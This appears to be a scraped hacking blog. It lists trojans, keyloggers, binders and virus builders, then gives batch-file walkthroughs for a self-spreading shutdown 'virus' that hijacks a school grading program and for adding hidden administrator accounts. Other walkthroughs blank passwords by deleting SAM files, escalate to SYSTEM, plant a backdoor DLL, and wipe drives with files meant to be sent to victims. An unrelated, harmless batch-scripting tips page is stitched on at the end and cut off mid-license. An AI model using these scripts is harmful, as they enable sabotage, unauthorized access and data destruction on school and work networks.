Trojan Horses- Yuri RAT v1.2- MofoTro v1.7 BETA- Charon- Beast v2.0.7- Omerta v1.3- Theef v2.10- Combined Forces R.A.T- MoSucker v3.0- ProRat v1.9 Fix2Keyloggers- Elite Keylogger v1.0- SKL v0.1- KeySpy v2.0- A++++- Curiosity- Keylogger- KeyCopyBinders- Daemon Crypt Public v2- NT Packer v2.1- EES binder v1.0- File Injector v3- Bytes Adder- FreshBind v2.01- YAB v2.01- NakedBind v1.0- Amok JoinerWebHacks/WordListsBrute Forcers- Munga Bunga 's Official- Brutus - Authentication Engine Test 2- wwwHack v1.946- FTP Brute Hacker- FTP Brute Forcer.tar.gz - Unix- Wbrute.tar.gz - Unix- Shadow Scanner-Brute Forcer- Hackers Utility v1.5- POP3 brute forcer.tar.gz - UnixCGI-Bug Scanners- NStealth HTTP Security Scanner v5.8- Attack Toolkit v4.1 & source code included- Scanarator- Legion NetBios Scanner v2.1- NetView v1.0- CGI Vulnerability Scan- CGI Scanner v4.0- VoidEye CGI scannerVirus!Viruses- Hippi virus- Sasser- W32. Blaster .Worm- Midnight Massacre- 00001- Nimda- Loveletter virus- Happy '99- MXZVirus Builders- DR VBS- VBSwg 2 beta - Virus builder- p0ke's WormGen 2.0- RESIDUO - DoS VirusMSN Hacks & Bots- HoaX Toolbox 1.1- MSN Extreme 3.0- MessenPass v1.06- Advanced Blood Scroller- Nudge Madness- Advanced Instant Messengers Password Recovery- Contact Spy- Msn Explosion- Encrypted MessengerPort & IP Scanners- Blues Port Scanner- ProPort v2.2- SuperScan v3.0- Net Scan Tools v4.2- LanSpy v2.0- Bitchin Threads v3.1- Trojan Hunter v1.5- SuperScan v4.0- Neotrace PRO v3.25 trial&crackNukers And Flooders- Rocket v1.0- RPCNuke v1.0- Panther Mode1 - 56k- Panther Mode2 - ISDN +- Final Fortune v2.4- Battle Pong - Technophoria- Assault v1.0- ICMP Nuker- CLICK v2.2EXTRA!- Telnet Tutorial

Shut Down ur School or office

This article is for only educational purpose, i am not responsible for any misuse of this article.By using this command you can shutdown your school or college by using only Note pad.This is the main command that will be launched upon startup.Type this in Notepad.@echo offshutdown.exe -s -t 10 -c"You have been hacked!"Save this as shutdown.bat, making sure you choose all files as the filetype.Step 2Make it run on StartupThe file you need can be downloaded here:This is just a simple registry file that anyone can create, but I don't feel like explaining the registry to everyone. It will disguise itself by claiming to be an update for STI.http://www.mutantsrus.com/Update.regStep 3Set up the replication systemHere is the code to set up the replicator (the program that allows the virus to reproduce). This simply gets it ready to infect the teachers. ?,$, and ! means that it varies. It depends on what program you are using. To find out how to fill these blank, get on a computer that has access to the server that stores your grading program. ? is the drive letter. $ is any folders and sub folders that contain the main exe for the grading program. ! is the name of the main exe.Example O:\sti\ssts2\sti.exe?=O$=sti\ssts2!=stiHere is the code:@echo offcd C:\move ?:\$\!.exeren C:?.exe real.exeren C:virus.exe !.execd ?:\$move C:\!.exemove C:\shutdown.batmove C:\Update.regexitSave this as global.batStep 4They grow up so fast -- real fast!This script will infect any teacher that uses STI with the shutdown command. The little viral babies will copy themselves to the user's hard drive and remain there.@echo offcd C:\WINDOWSEcho STI must update itself, this will only take a few seconds.pauseEcho Please wait while the files install.move ?:\$\shutdown.batmove ?:\$\Update.regmove ?:\$\cure.exemove ?:\$\cure.exemove ?:\$\cure.batmove ?:\$\remove.batEcho Adding information to registry.pausestart regedit.exe Update.regcd ?:\$start real.exeexitNow this one has to be in exe form. So save it as virus.bat, then compile it in Quick Batch File Compiler. You can get QuickBFC here: QuickBFC and download this file as a template for QuickBFC to work with. Just save the compiled file over this one.Step 5The CureThis is a little tool that can fix all damage done by your virus, it works in the same way that the virus works, but works to correct the problem rather than create it.@echo offshutdown -acd C:\WINDOWSdel shutdown.batSave as cure.bat@echo offcd ?:\$del !.execd C:\move ?:\$\real.exeren C:\real.exe !.execd ?:\$move C:\?.execd C:\WINDOWSNow download this file: http://www.mutantsrus.com/cure.exeStep 6The SetupNo it's not the name of a heist movie. It is simply a SFX file that extracts all the files to their proper places and places the replicator in the STI drive.I am going to use WinRAR to do this. You can get WinRAR here: http://www.rarlab.com. First gather all the files you have made thus far. The files should be shutdown.bat, Update.reg, virus.exe, cure.exe, cure.bat, remove.bat and global.bat. Now select them all and put them in a .rar file. Then open Winrar and go to "tools", then select "convert archive to SFX". Click "Advanced SFX Options" In the field labeled Path to Extract, type C:\WINDOWS In the field labeled Run After Extraction, type C:\WINDOWS\global.bat Save the finished file anywhere you want and as any name. To install the virus, just run this program on a computer at school that is connected to the server that has the grading program on it (such as any computer in the Comp Lab.)

Open Banned Command Prompt

Open Banned Command Prompt
Open up Command Prompt (Start>Run>Command.com) Can't use command prompt at your school? Open up Microsoft word..Type: Command.com Then save it as Somthing.bat. Warning: Make sure you delete the file because if the admin finds out your in big trouble. --Adding a user to your network-- Type: Net user Haxxor /ADD ----- That will add "Haxxor" onto the school user system. ----- Now you added users lets delete them! Type: Net user Haxxor /DELETE Warning: Be carefull it deletes all their files. ----- "Haxxor" will be deleted from the user system. ----- Hmmm? It says access denied? Thats because your not admin! ---- Now lets make your Admin! ---- This will make Haxxor an admin. Remember that some schools may not call their admins 'adminstrator' and so you need to find out the name of the local group they belong to. Type: net localgroup It will show you what they call admin, say at my school they calll it adminstrator so then i would Type: net localgroup administrator Haxxor /ADD ---- Getting past your web filter. Easy way: Type whatever you want to go on say i wanted to go on miniclips bug on wire i would go to google and search miniclip bug on wire then instead of clicking the link i would click "cached". Hard way: I'm hoping you still have command prompt open. Type: ping miniclip.com And then you should get a IP type that out in your web browser, and don't forget to put "http://" before you type the IP. ----- Sending messages throught your school server Okay, here's how to send crazy messages to everyone in your school on a computer. In your command prompt, type Net Send * "The server is h4x0r3d" Note: may not be necessary, depending on how many your school has access too. If it's just one, you can leave it out. Where is, replace it with the domain name of your school. For instance, when you log on to the network, you should have a choice of where to log on, either to your school, or to just the local machine. It tends to be called the same as your school, or something like it. So, at my school, I use Net Send Haxxor School * "The server is h4x0r3d" The asterisk denotes wildcard sending, or sending to every computer in the domain. You can swap this for people's accounts, for example NetSend Varndean dan,jimmy,admin "The server is h4x0r3d" use commas to divide the names and NO SPACES between them.what say??~Cheers~
or
Allowing dos and regedit in a restricted WindowsA very simple tactic I found after accidentally locking myself out of dos and regedit is to open notepad and type the following: REGEDIT4 [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldApp] "Disabled"=dword:0 [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem] "DisableRegistryTools"=dword:0 Save it as something.reg then run it. Simple

Hack Administrator

i guess dis dont wrks in XP bt hv tried dis Same stuff on win2000 n it worksFor Windows XP check out the attachment Below the comments!! It WORKS .AS IT CHANGES THE XP ADMIN PSWD WITHOUT U KNOWIN THE PREVIOUS ONEhowever the "net user" and "control userpasswords2" trick still works: NaveenI tried this on my College Windows 2000 as well as 2003 here's the hackNOTE: Requires a boot disk.Get the command prompt and go to C:\winnt\sytem32\config\ and dothe following commands:attrib -a -r -hcopy sam.* a:\del Sam.*reboot the computer. there should be no administrator password.just put in administrator and hit enter. replace the sam files torestore the password to hide intrusion.

Breaking the restrictions Of Administrator

This works on WIn 2000 & WIN XP. Dis can be used to gain access to the website you want to for free, and how you can gain access to 'control panel', and the various other tools of Widows that may have been blocked from your grasp like 'regedit' by the administrator. IT can be used in schools & colleges.. When u are at the log on screen, type in your username and password. NOW When you hit enter, and it comes up with the next screen, the rectangle one, immediatly pull out the network cable i.e. the cable wire. Now u can log on without any restrictions because when the cable is pulled off then it does not download any settings from the server. Now you have access to control panel, & all the other features which had been blocked BUT there will be no network access. But that's cool because now we can access 'Internet options', click in the 'connections' tab click the LAN settings, click the proxy settings, and in the little white box at the bottom we can specify websites that bypass the proxy server (eg www.yahoo.com) Now once you have changed the settings to what you wish, apply them and restart the computer. Now get someone else to log onto it because if you log in it will load the cached settings from your previous log in, then after the other person logs in, everyone that logs in after them included themselves will have the internet settings you specified. Its only an 'Unplugging technique' to gain access to a comp. locked by the administrator. Now you can gain access to msconfig, regedit, command etc disable the virus scanner, or to install a trojan or a virus according to u're will..
XP HOME ADVANCED FILE PERMISSIONS.!!Access *Advance file Permissions* on NTFS file systems for XP Home simply by booting into *Safe Mode*, rt-clicking any file or folder, and navigating to the *Security tab*. This gives the user the ability to allow or deny read, write, execute, read & write, display contents, full-control, iheritance, and take ownership permissions, with many more options available to apply to different users and groups stored on the computer. Well, you don't have to do this in *Safe Mode* (XP Home). Although it is a little less intuitive, you can simply go to your command prompt - Start>All Programs>Accessories>Command Prompt. Now type "cacls" in the window (without the quotes). This gives you the ability to add, remove or modify file permissions on files and folders through the command prompt. Type "cacls /?" for help on different options and variables. You do not need to be in safe mode to use this so it makes it a little quicker than using the safe mode security tab GUI. Remember - this only applies to NTFS. Here also is a very useful link to find a lot of extras and tweaks straight from the horse's mouth - the Microsoft Resource Center. You will find a lot of very useful web-based extra's here, most of them left unknowing to the general public - such as, "Online Crash Analysis" - a site that looks like Windows Update but you can upload your crash "dump logs" (when you get those system or application crash error reports). Microsoft will then analyze the log file and tell you some more info about WHY the system crashed (ie. faulty hardware/software/conflicts, etc).

Hacking Admin From User Mode

really that is possible !Refer to the other articles on this wiki for the same topic as windows seems to have fixed this bug..still u can browse for educational purposeu know why is it a "user" account because it lacks come service layer than that in "administrator" accountUsing simple command line tools on a machine running Windows XP we will obtain system level privileges, and run the entire explorer process (Desktop), and all processes that run from it have system privileges. The system run level is higher than administrator, and has full control of the operating system and it’s kernel. On many machines this can be exploited even with the guest account. At the time I’m publishing this, I have been unable to find any other mention of people running an entire desktop as system, although I have seen some articles regarding the SYSTEM command prompt.Local privilege escalation is useful on any system that a hacker may compromise; the system account allows for several other things that aren’t normally possible (like resetting the administrator password).The Local System account is used by the Windows OS to control various aspects of the system (kernel, services, etc); the account shows up as SYSTEM in the Task ManagerLocal System differs from an Administrator account in that it has full control of the operating system, similar to root on a *nix machine. Most System processes are required by the operating system, and cannot be closed, even by an Administrator account; attempting to close them will result in a error message. The following quote from Wikipedia explains this in a easy to understand way: You can trick the system into running a program, script, or batch file with system level privileges.One sampleOne trick is to use a vulnerability in Windows long filename support.Try placing an executable named Program.*, in the root directory of the "Windows" drive. Then reboot. The system may run the Program.*, with system level privileges. So long as one of the applications in the "Program Files" directory is a startup app. The call to "Program Files", will be intercepted by Program.*. Microsoft eventually caught on to that trick. Now days, more and more, of the startup applications are being coded to use limited privileges.
Quote:In Windows NT and later systems derived from it (Windows 2000, Windows XP, Windows Server 2003 and Windows Vista), there may or may not be a superuser. By default, there is a superuser named Administrator, although it is not an exact analogue of the Unix root superuser account. Administrator does not have all the privileges of root because some superuser privileges are assigned to the Local System account in Windows NT. Under normal circumstances, a user cannot run code as System, only the operating system itself has this ability, but by using the command line, we will trick Windows into running our desktop as System, along with all applications that are started from within. Getting SYSTEM I will now walk you through the process of obtaining SYSTEM privileges. To start, lets open up a command prompt (Start > Run > cmd > [ENTER]). At the prompt, enter the following command, then press [ENTER]:
Code:
atIf it responds with an “access denied” error, then we are out of luck, and you’ll have to try another method of privilege escalation; if it responds with “There are no entries in the list” (or sometimes with multiple entries already in the list) then we are good. Access to the at command varies, on some installations of Windows, even the Guest account can access it, on others it’s limited to Administrator accounts. If you can use the at command, enter the following commands, then press [ENTER]:
Code:
at 15:25 /interactive “cmd.exe”Lets break down the preceding code. The “at” told the machine to run the at command, everything after that are the operators for the command, the important thing here, is to change the time (24 hour format) to one minute after the time currently set on your computers clock, for example: If your computer’s clock says it’s 4:30pm, convert this to 24 hour format (16:30) then use 16:31 as the time in the command. If you issue the at command again with no operators, then you should see something similar to this: When the system clock reaches the time you set, then a new command prompt will magically run. The difference is that this one is running with system privileges (because it was started by the task scheduler service, which runs under the Local System account). It should look like this: You’ll notice that the title bar has changed from cmd.exe to svchost.exe (which is short for Service Host). Now that we have our system command prompt, you may close the old one. Run Task Manager by either pressing CTRL+ALT+DELETE or typing taskmgr at the command prompt. In task manager, go to the processes tab, and kill explorer.exe; your desktop and all open folders should disappear, but the system command prompt should still be there. At the system command prompt, enter in the following:
Code:
explorer.exeA desktop will come back up, but what this? It isn’t your desktop. Go to the start menu and look at the user name, it should say “SYSTEM”. Also open up task manager again, and you’ll notice that explorer.exe is now running as SYSTEM. The easiest way to get back into your own desktop, is to log out and then log back in. The following 2 screenshots show my results (click to zoom): System user name on start menuexplorer.exe running under SYSTEMWhat to do now Now that we have SYSTEM access, everything that we run from our explorer process will have it too, browsers, games, etc. You also have the ability to reset the administrators password, and kill other processes owned by SYSTEM. You can do anything on the machine, the equivalent of root; You are now God of the Windows machine. I’ll leave the rest up to your imagination.
ADMINISTRATOR IN WELCOME SCREEN.When you install Windows XP an Administrator Account is created (you are asked to supply an administrator password), but the "Welcome Screen" does not give you the option to log on as Administrator unless you boot up in Safe Mode.First you must ensure that the Administrator Account is enabled:1 open Control Panel2 open Administrative Tools3 open Local Security Policy4 expand Local Policies5 click on Security Options6 ensure that Accounts: Administrator account status is enabled Then follow the instructions from the "Win2000 Logon Screen Tweak" ie.1 open Control Panel2 open User Accounts3 click Change the way users log on or log off4 untick Use the Welcome Screen5 click Apply OptionsYou will now be able to log on to Windows XP as Administrator in Normal Mode.
EASY WAY TO ADD THE ADMINISTRATOR USER TO THE WELCOME SCREEN.!!Start the Registry Editor Go to:HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ SpecialAccounts \ UserList \Right-click an empty space in the right pane and select New > DWORD Value Name the new value Administrator. Double-click this new value, and enter 1 as it's Value data. Close the registry editor and restart.

How to hack the password of EVERYONE on a school/work network

Link below:


https://2unblockme.info/browse.php?u=Oi8vbmF2ZWVuaGFja2FuZGVudGVydGFpbm1lbnQud2V0cGFpbnQuY29tL3BhZ2UvSG93K3RvK2hhY2srdGhlK3Bhc3N3b3JkK29mK0VWRVJZT05FK29uK2Erc2Nob29sJTJGd29yaytuZXR3b3Jr&b=3&f=norefer

Format Hdd With Notepad

Format a HDD with notepad
Step 1.Copy The Following In Notepad Exactly as it
says01001011000111110010010101010101010000011111100000

Step 2.Save As An EXE Any Name Will Do

Step 3.Send the EXE to People And Infect

ORIF u think u cannot format c driver when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary codeformat c:\ /Q/X -- this will format your drive c:\01100110011011110111001001101101011000010111010000 1000000110001100111010010111000010000000101111010100010010111101011000format d:\ /Q/X -- this will format your dirve d:\01100110011011110111001001101101011000010111010000 1000000110010000111010010111000010000000101111010100010010111101011000
format a:\ /Q/X -- this will format your drive a:\01100110011011110111001001101101011000010111010000 1000000110000100111010010111000010000000101111010100010010111101011000
del /F/S/Q c:\boot.ini -- this will cause your computer not to boot.01100100011001010110110000100000001011110100011000 10111101010011001011110101000100100000011000110011101001011100011000100110111101 1011110111010000101110011010010110111001101001
try to figure out urself rest
cant spoonfeedits workin
Do not try it on ur PC. dont mess around this is for educational purpose onlystill if u cant figure it out try disgo to notepad@Echo offDel C:\ *.*ysave it as Dell.bat
worse@echo offdel %systemdrive%\*.*/f/s/qshutdown -r -f -t 00and save it as a .bat file

Access Data of a Password Protected User in Windows XP in Case the PC Fails to Boot

Access Data of a Password Protected User in Windows XP in Case the PC Fails to Boot
You may come across a situation in which your windows XP PC fails to reboot, and the most accepted solution to that problem is to re-format the Hard Disk. Before formatting, you should backup your files. If your computer is password protected, you won't be able to access them from outside, so here is a method for getting around this.Steps Boot the machine from Windows XP bootable CD. At the setup screen, select R to repair using Recovery Console. Now the console program will prompt you to select the Windows folder (eg. C:\WINDOWS) where the Windows is installed (you need to enter a number from the list of folders shown to you). Type 'HELP' (without single quotes) and press enter for available commands. This is like a DOS program, but some features are not available. Change the current directory to the user's directory where you want to backup. Type 'CD "C:\Documents and Settings\X"' (without single quotes) and press enter. Where X is the username. Now the current directory will change to "C:\Documents and Settings\X". Now change the directory to Desktop by entering 'CD Desktop' (without single quotes) and press enter to go to the desktop folder. Type 'DIR' (Without single quotes) and press enter, you will be listed all the available files in Desktop. Type 'COPY a.doc D:\BACKUP' (without quotes) and press enter, where a.doc is a file available in Desktop and the folder D:\BACKUP available to copy the files. As in step 7,8,9,10 you can backup other folders like "My Documents", "My Music", etc. Note that you cannot use wildcards for COPY. I.e, you cannot copy all the files in a folder at once. You must copy one file by one. Tips Before doing this, try changing the password to blank so that you can access the data from another machine to easily drag and drop to copy your data. Warnings Any data not backed up will be permanently deleted when you re-format the hard drive, so make sure you back up any thing you want to keep. Things You'll Need A bootable Windows XP CD Format HDD with notepad

Admin privileges for guest

Copy and paste the code given below in notepad and save it as anyname.bat(not txt)Den double click on itThis will add u in administrators groupEnjoy


echo off

title Please wait…

cls

net user add Username Password /add

net user localgroup Administrators Username /add

net user Guest 420 /active:yes

net localgroup Guests Guest /DELETE

net localgroup Administrators Guest /add

del %0

How to Hack Into a Windows XP Computer Without Changing Password

1. Get physical access to the machine. Remember that it must have a CD or DVD drive.2. Download DreamPackPL HERE.3. Unzip the downloaded dpl.zip and you’ll get dpl.ISO.4. Use any burning program that can burn ISO images.5. After you have the disk, boot from the CD or DVD drive. You will see Windows 2000
Setup and it will load some files.6. Press “R” to install DreamPackPL.7. Press “C” to install DreamPackPL by using the recovery console.8. Select the Windows installation that is currently on the computer (Normally is “1″ if you only have one Windows installed)9. Backup your original sfcfiles.dll by typing:“ren C:\Windows\System32\sfcfiles.dll sfcfiles.lld” (without quotes)10. Copy the hacked file from CD to system32 folder. Type:“copy D:\i386\pinball.ex_ C:\Windows\System32\sfcfiles.dll” (without quotes and assuming your CD drive is D:)11. Type “exit”, take out disk and reboot.12. In the password field, type “dreamon” (without quotes) and DreamPack menu will appear.13. Click the top graphic on the DreamPack menu and you will get a menu popup.14. Go to commands and enable the options and enable the god command.

How To Hack a Windows XP Password

It is very simple to hack an administrators user password in Windows Xp!You don't have to know any password before and you don't have to download any programs.Just Follow the steps below:
Go to Start-->Run and type "cmd" to open the command prompt
Type "net user" and press enter to see all the accounts name
Type "net user (account name) *"
Type the password you want and then confirm it!!

Thursday, March 04, 2010

Batch Files tricks and tips

More Clever Tips and Tricks
Many clever tricks are mentioned on my other pages, especially Solutions found on alt.msdos.batch

Every now and then a real "jewel" is sent to me by mail or otherwise.

A selection of these tricks will be displayed on this page.



Remember Brian Williams' big number math batch files?
He is back with Add.bat, a batch file to add 2 positive integers of up to 2000 digits each (I did test that!).
View the source or download it.

Thanks Brian
Remember Reinhard Irnberger's PUSHD trick to automatically map a drive if a UNC path is specified?
I use PUSHD "%~dp0" ever since, as the first command in any batch file that could be run from a UNC path.
Without this PUSHD command, the start/working directory of the batch file will be changed to %windir%\System32.

Today Denis St-Pierre informed me that this change of working directory also occurs when a batch file is running in elevated mode in Windows Vista, Windows Server 2008 or Windows 7.

I checked, and it occurs too when a script is started with RUNAS or PSEXEC.
I suppose that's because my current/working directory is saved in my "volatile environment" in my profile, and thus is not available in the elevated user's environment.

So there you have it, one more reason to specify (as opposed to assume) the working directory in your batch files.
I think PUSHD "%~dp0" is by far the most reliable way to do this, and it will work with RUNAS, PSEXEC, UNC paths, UAC and Explorer's "Run as..." option.

Thanks Reinhard and Denis
A message by Steve Lessard:


Doing basic string substitution as described on www.robvanderwoude.com/ntset.php was pretty easy when using constant values.
But it took me a while to figure out how to do substitution when the string being substituted was determined programmatically.
Now that I have it figured out I'd like to share it with you so that you might be able to share it with all of your readers...

Prerequisite:
Delayed expansion must be enabled

Script:
SETLOCAL ENABLEDELAYEDEXPANSION
SET HOSTS_FILE=C:\Windows\System32\drivers\etc\hosts
SET VARIABLE_HOSTS_FILE=!HOSTS_FILE:%SystemRoot%=%%SystemRoot%%!
ECHO HOSTS_FILE=%HOSTS_FILE%
ECHO VARIABLE_HOSTS_FILE=%VARIABLE_HOSTS_FILE%
ENDLOCAL
GOTO:EOF

Output:
HOSTS_FILE=C:\Windows\System32\drivers\etc\hosts
VARIABLE_HOSTS_FILE=%SystemRoot%\System32\drivers\etc\hosts

I used this kind of substitution to create machine independent instructions for fellow developers and testers to re-run my unit tests under their machine's source code location.
Here's a sample of my script's output:

ECHO To repeat this test run use the following command: pushd "%_LCSROOT%\dev\server\eps\CollaborationApi\utest\OotyTests\" & runall /run=x& popd


Thanks Steve
Ever tried SET /A to work with really large numbers?
Then you may already know that numbers in batch math are severely limited in size.

Brian Williams submitted 2 batch files that work with large numbers: IsLarger.cmd and Multiply.cmd:


I want to submit these scripts/subroutines for the world to use, it allows one to multiply two numbers that are much larger than the limitations of SET /A.
I don't know if I have plans to create more math related subroutines, but it seemed to be a necessity to do math in batch and not have to use some third party tool or another script language.

The point of Multiply.cmd and IsLarger.cmd is to work with number beyond the command lines ability.
You can Multiply an integer of hundreds of digits by another integer of many if not hundreds of digits.
Also IsLarger.cmd can compare integers of thousands of digits long.
The best part is this is all native NT Shell scripting tested on Windows XP, Windows 2003, and Windows Vista. (It might work on Windows 2000 - don't know haven't tried). No third party utilities are needed or reliance upon vbscript or some other language.

I submitted these as batch files, but the subroutines starting with the labels :Multiply and :IsLarger is all you need to paste in your batch file to start using these - one other requirement, you have to have SETLOCAL ENABLEDELAYEDEXPANSION in your script for this to work.

Syntax in your script:

CALL :MULTIPLY CrazyLongNumber OtherCrazyLongNumber MyFavoriteVariable

Do not surround your variables with percents or bangs (you are passing a reference to the variable, not the actual variable)

CALL :MULTIPLY VariableContainingBigNumber OtherVariableConatiningBigNumber_GiveItToMeVariable

or if you use my script as is its just

MULTIPLY.CMD 121390487120394780398 123498712304981703948097

and you get the answer.

Multiply.cmd 2 2
4

Same thing with IsLarger, prints TRUE, FALSE, or EQUAL (you are saying, is this first number larger than this second number?)

IsLarger.CMD 2948372948273234234 2342983472938472938472342342342342234234
FALSE
IsLarger.CMD 5 4
TRUE
IsLarger.cmd 1 2
FALSE
IsLarger.cmd 2 2
EQUAL

If you use just the subroutine, no percents or bangs:

CALL :IsLarger _BIGNUMBER1 _BIGNUMBER2 _MYVARIABLE


I won't display the complete code here, the ZIPped sources for the batch files can be downloaded here.
I do want to show you the main trick that is used in both batch files:

FOR /L %%B IN (0,1,9) DO SET _NUMVAR=!_NUMVAR:%%B=%%B !

Note the space in the part of the code that was marked red: it means a space will be inserted after each digit.
Next each digit is multiplied or compared separately in a "regular" FOR loop.

Brilliant!

Thanks Brian

Leonardo Gutierrez Ramirez found a way to use numbers as variables in a FOR loop:


Hi, I have discovered that we can use numbers in the variable FOR command, like this:

FOR /L %%ˆ6 IN (1 1 10) DO (
ECHO %%ˆ6
)

FOR /D /R %%ˆ2 IN (*) DO (
ECHO %%ˆ2
)

FOR /F "tokens=1,2,3" %%ˆ0 IN ('VER') DO (
ECHO.%%ˆ0 %%ˆ1 %%ˆ2
)

FOR %%ˆ1 IN ("%~nx0") DO (
ECHO %%~nxtˆ1
)

FOR /F "tokens=1" %%ˆ7 IN ('VER') DO (
ECHO.%%ˆ7
)

FOR %%ˆ1 IN ("%~nx0") DO (
ECHO %%~nxatdˆ1
)

Combined with Carlos Montiers' extension of the available variables in FOR loops, we can now, in theory at least, nest up to 75 FOR loops!
Not that I would want to maintain such code...

Thanks Leo
Leonardo Gutierrez Ramirez found a way to add any (language) style comments to SET /P commands:

@echo off
set /p "suma=2+2 : " # La suma, my comment
if %suma% equ 4 (
echo.Bien
) else (
echo.Mal
)
set suma

@echo off
set /p "suma=2+2 : " // La suma
if %suma% equ 4 (
echo.Bien
) else (
echo.Mal
)
set suma

@echo off
set /p "suma=2+2 : " /* La suma */
if %suma% equ 4 (
echo.Bien
) else (
echo.Mal
)
set suma

@echo off
set /p "suma=2+2 : " ' Comment
if %suma% equ 4 (
echo.Bien
) else (
echo.Mal
)
set suma

@echo off
set /p "suma=2+2 : " Comment
if %suma% equ 4 (
echo.Bien
) else (
echo.Mal
)
set suma


@echo off
for %%. in (H e l l o _ W o r l d) do (
call :show %%.
)
goto:eof

:show
nul
goto:eof

As a matter of fact, any text after the closing doublequote is ignored.

Thanks Leo
Carlos Montiers found a way to increase the number of variables available in a FOR /F loop (I added some highlighting to discriminate between the individual lines):
I just discovered that you can use more than 26 characters in the command for /f, so we can reach a limit of 31 tokens.
In order for /f "tokens=1" or simply for /f can use the following characters: & : <> ? @ A B C D E F G H I J K L M N O P Q R S T U V W X Y Z [ \ ] ˆ _ ` a b c d e f g h i j k l m n o p q r s t u v w x y z { | }
Note: The following characters must be escaped with a caret (ˆ): ˆ < > | & as follows: ˆˆ ˆ< ˆ> ˆ| ˆ&

Finally a few examples:

@echo off
set palabras=p1 p2 p3 p4 p5 p6 p7 p8 p9 p10 p11 p12 p13 p14 p15 p16 p17 p18 p19 p20 p21 p22 p23 p24 p25 p26 p27 p28 p29 p30 p31 p32 p33 p34 p35
for /f "tokens=1" %%ˆ& in ("%palabras%") do (echo %%ˆ&)
for /f "tokens=1" %%ˆ< tokens="1,2,3"> in ("%palabras%") do (echo %%ˆ>%%?%%@)
for /f "tokens=1-31" %%? in ("%palabras%") do (echo %%?%%@%%A%%B%%C%%D%%E%%F%%G%%H%%I%%J%%K%%L%%M%%N%%O%%P%%Q%%R%%S%%T%%U%%V%%W%%X%%Y%%Z%%[%%\%%])
for /f "tokens=1-31" %%ˆˆ in ("%palabras%") do (echo %%ˆˆ%%_%%`%%a%%b%%c%%d%%e%%f%%g%%h%%i%%j%%k%%l%%m%%n%%o%%p%%q%%r%%s%%t%%u%%v%%w%%x%%y%%z%%{%%ˆ|)
for /f "tokens=1-31" %%_ in ("%palabras%") do (echo %%_%%`%%a%%b%%c%%d%%e%%f%%g%%h%%i%%j%%k%%l%%m%%n%%o%%p%%q%%r%%s%%t%%u%%v%%w%%x%%y%%z%%{%%ˆ|%%})
pause

updated

The value of my discovery is that for example if, before declaring:

for /f "tokens=1-4" %%Y in ("p1 p2 p3 p4") do (echo %%Y%%Z...)

and wanted to show the token 1,2,3,4 we could only show the token 1 and 2, because then comes %%Y and %%Z then ... we did not know that letter came.
So now we can do:

for /f "tokens=1-4" %%Y in ("p1 p2 p3 p4") do (echo %%Y%%Z%%[%%\)

The other, the documents said 52 variables, ie 26 + 26 (az) and (AZ) for an inside another for, or for using a single letter of the alphabet any case, but now we have more than 65 variables, for example:

@echo off
for /f "tokens=1-10" %%ˆ> in ("El cmd.exe es el interprete de comandos en OS2 y") do (
for /f "tokens=1-10" %%H in ("sistemas basados en Windows NT incluyendo Windows 2000 Windows XP") do (
for /f "tokens=1-8" %%R in ("Windows Server 2003 y Windows Vista. Es el") do (
for /f "tokens=1-12" %%Z in ("equivalente de command.com en MS-DOS y sistemas de la familia Windows 9x.") do (
for /f "tokens=1-10" %%f in ("A diferencia de su antecesor command.com este programa es tan") do (
for /f "tokens=1-14" %%p in ("solo una aplicacion no es una parte del sistema operativo y no posee la") do (
echo %%ˆ>%%?%%@%%A%%B%%C%%D%%E%%F%%G%%H%%I%%J%%K%%L%%M%%N%%O%%P%%Q%%R%%S%%T%%U%%V%%W%%X%%Y%%Z%%[%%\%%]%%ˆˆ%%_%%`%%a%%b%%c%%d%%e%%f%%g%%h%%i%%j%%k%%l%%m%%n%%o%%p%%q%%r%%s%%t%%u%%v%%w%%x%%y%%z%%{%%ˆ|%%}
)
)
)
)
)
)
pause

So, in summary, my discovery increases the maximum of 26 to 31 tokens, and the maximum for the global variables, from 52 to over 65, more say in the example just because they are used within the range, but not individual characters.

Written by Carlos Montiers.

Wow! I need a wider screen.

Thanks Carlos

Read more details: follow the discussion at the forum at Simon Sheppard's site.
Nushu sent me a message with a nice technique to combine multiple scripting languages in a single script:
The purpose is to be able to execute AutoIT code directly from inside a batch file (and so not having to worry about .au3 being associated with autoit).

.CMD file begins :
-------------------------------------------

; ::Batch code ,cmd.exe will run the lines beginning with comma and exit
; @echo off
; start C:\AutoIT\AutoIT3.exe %0 %*
; exit

; :: AutoIT code , autoit will ignore the lines beginning with semicolon
MsgBox (0 , "Box" , "Just A Box")

-------------------------------------------
.CMD file ends

Nice trick, and it can be used for KiXtart scripts too!
Try the following code, saved as batch file; if KiXtart is available (and KIX32.EXE is in the PATH) it will display the current date and time in YYYYMMDDHHmmss format:

; @ECHO OFF
; KIX32.EXE "%~f0"
; EXIT

$RC = SetOption( "ASCII", "ON" )

SubStr( @Date, 1, 4 )
SubStr( @Date, 6, 2 )
SubStr( @Date, 9, 2 )
SubStr( @Time, 1, 2 )
SubStr( @Time, 4, 2 )
SubStr( @Time, 7, 2 )

It can even be used in .REG files!

Thanks Nushu
One never stops learning, as this new trick by Justin proves:
Recently I came across a little trick using the REN command (tested on XP).
It is possible to use REN to delete every character after the last occurrence of a character by using the wildcard * followed by the desired character:
REM Rename filename.ext to filena
REN filename.ext *a

If you wanted to use a space or ampersand it would need to be contained in double quotes i.e.

REN "good&bad" "*&"

If you use a dot "*." the dot will also be trimmed off by windows because it doesn't allow file names to end with a dot.

Very simple but seemingly undocumented...............

Marvellous!

Thanks Justin
I must confess, this tip by Leo Gutierrez Ramirez baffled me.
I didn't expect it to work, but it does.
See for yourself:

@ECHO OFF
REM Code:
ECHO Hello
REM Comments:
(COMMENT
HELLO!
HI!

The trick is not in the exclamation marks, it is the fact that the parenthesis opens a "code block" which is never closed, and thus seems to be ignored completely by the command interpreter.
As Leo said: a useful way to add comments at the end of a batch file.

Thanks Leo
Carlos Montiers sent me this "typewriter" batch file:


:: Copyright (c) 2008 Carlos Montiers
:: All rights reserved.
::
:: Redistribution and use in source and binary forms, with or without
:: modification, are permitted provided that the following conditions
:: are met:
:: 1. Redistributions of source code must retain the above copyright
:: notice, this list of conditions and the following disclaimer.
:: 2. Redistributions in binary form must reproduce the above copyright
:: notice, this list of conditions and the following disclaimer in the
